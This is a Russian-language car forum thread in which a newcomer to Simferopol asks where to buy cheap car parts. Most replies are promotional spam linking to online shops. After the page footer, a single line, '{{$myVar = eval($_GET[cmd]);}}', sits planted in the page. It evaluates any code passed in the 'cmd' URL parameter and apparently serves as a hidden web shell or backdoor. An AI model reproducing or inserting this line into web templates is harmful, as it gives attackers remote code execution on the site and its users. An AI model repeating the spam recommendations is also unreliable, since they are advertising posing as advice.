+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Автозапчасти в Симферополе


  1. #1
    Мимо проходил aint is on a distinguished road Аватар для aint
    Регистрация
    08.03.2019
    Сообщений
    37

    Автозапчасти в Симферополе

    Совсем недавно переехал в Симферополь и тут еще с автомобилем проблемы начались. Я причину поломки обнаружил и теперь ищу недорогой магазин с автозапчастями, может посоветуете мне что-то по данному поводу?

  2. #2
    Мимо проходил restav is on a distinguished road Аватар для restav
    Регистрация
    13.02.2019
    Сообщений
    38
    В последние разы заказывал автомобильные запчасти в интернет-магазинах, там выбор побольше и цены пониже. Если не боитесь, то можете съездить на автомобильную разборку и поискать нужные Вам запчасти там, по поводу качества ничего сказать не могу, тут уж как повезет. Ну а стоимость запчастей ниже, чем в любом другом месте.

  3. #3
    Мимо проходил persh is on a distinguished road Аватар для persh
    Регистрация
    25.02.2019
    Сообщений
    37
    Был один очень хороший магазин с автомобильным запчастями в Симферополе, но его в прошлом году закрыли по какой-то причине. Что касается автомобильных разборок, то иногда там можно найти что-то реально классное, но в большинстве случаев там продают убитые детали.

  4. #4
    Мимо проходил everd is on a distinguished road Аватар для everd
    Регистрация
    24.01.2019
    Сообщений
    37
    Цена на автомобильные запчасти постоянно растут и я стараюсь экономить покупая запчасти на автомобильных разборках. Но не всегда удается найти деталь в хорошем состоянии и по доступной цене, поэтому приходится покупать их в магазинах. Иногда можно подыскать более дешевый аналог, этот вариант тоже стоит рассмотреть. Если что, можно купить автозапчасти в Симферополе вот здесь: https://avzor.ru/

  5. #5
    Мимо проходил Larkin is on a distinguished road Аватар для Larkin
    Регистрация
    23.02.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    35
    Хорошие автозапчасти я нашёл https://romario-auto.com/select/price_group111/ тут. Друзья подсказали мне этих ребят, а как вы понимаете, навряд ли друзья будут советовать что-то плохое. Вот и воспользовался их услугами и остался полностью удовлетворённым.

  6. #6
    Новичок vasilijdzhig is on a distinguished road Аватар для vasilijdzhig
    Регистрация
    18.11.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    107
    4shinu - Продажа новой резины для автомобилей, спецтехники. Интернет-магазин «4 шины». На сайте представлены автошины следующих марок Bridgestone, Barum, BFGoodrich, Continental, Cooper, Contyre, Debica, Diplomat, Dunlop, Dayton, Falken, Federal, Fulda, Firestone, Gislaved, Goodyear, General Tire, Goodride, Gremax, Goform, Gripmax, Hankook, Kumho, Kelly, Kleber, Michelin, Matador, Nokian, Nexen, Pirelli, Sava, Toyo, Triangle, Vredestein, Viatti, Viking, Yokohama. Адресная и курьерская доставка резин в любую точку. Гарантия.

    automehanika – Интернет магазин «Автомеханика» автомобильных товаров. Товары на любой вкус и кошелек. Автозвук, автоакустика, автомобильные усилители, автосабвуферы, магнитолы, автокосметика, полироли, автокресла детские, моторные масла, трансмиссионные масла, автомобильные багажники, автомобильные лампы и фары, ксенон, модульная оптика, проводка и переходники, светодиоды, сигнальные лампы, струйный омыватель фар, указатели поворотов, автохимия, антифриз, жидкости и присадки, клеи и герметики, промывки, очистители, смазки и консерванты, автосигнализации, видеорегистраторы, камеры заднего вида, парктроники, радар-детекторы, аккумуляторы, зарядные устройства для акб, оплетки руля и многое другое.


    rezinatop – «РезинаТОП» онлайн магазин автомобильных товаров. У нас вы найдете автомобильную электронику, автохимию, автомасла, расходные материалы, запасти по дисконтным ценам. Гарантия, доставка, программа лояльности для постоянных клиентов.

  7. #7
    GTI-Racing iskander.bulatov96 is on a distinguished road Аватар для iskander.bulatov96
    Регистрация
    07.09.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    438
    Мыть машины может быть занимательным, вы знали об этом? Просто надо взять нормальное средство для помывки. Так я смог автошампунь купить https://avtoshampun.ru/catalog/avtokhimiya_dlya_moek_1/ по приятной цене, использовать его проще простого, а эффект замечательный. Зайдете в магазине и увидите как много есть моющего

  8. #8
    Новичок HaTali is on a distinguished road Аватар для HaTali
    Регистрация
    15.12.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    115
    Если вам потребуется купить запчасти для сельскохозяйственной техники и спецтехники, то в Крыму есть филиал компании «АМР», которая специализируется на поставках таких запчастей по всей РФ. На сайте компании https://gk-amr.ru можете посмотреть весь каталог запчастей, которые они предлагают.

+ Ответить в теме

Похожие темы

  1. Автозапчасти для клуба
    от Alexandr 922 в разделе Бизнес
    Ответов: 61
    Последнее сообщение: 05.04.2024, 21:46
  2. Автозапчасти со скидкой для клуба!!!
    от ™B®embo™ в разделе Партнеры / Клубные скидки
    Ответов: 4
    Последнее сообщение: 01.04.2024, 19:00
  3. АВТОЗАПЧАСТИ
    от Alexist в разделе Реклама
    Ответов: 3
    Последнее сообщение: 01.04.2024, 16:26
  4. б/у автозапчасти
    от sergey1414 в разделе Курилка
    Ответов: 0
    Последнее сообщение: 29.04.2019, 19:39
  5. Б.у автозапчасти с 300 авторазборов европы
    от Kristof1721 в разделе Курилка
    Ответов: 0
    Последнее сообщение: 14.01.2007, 16:07

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}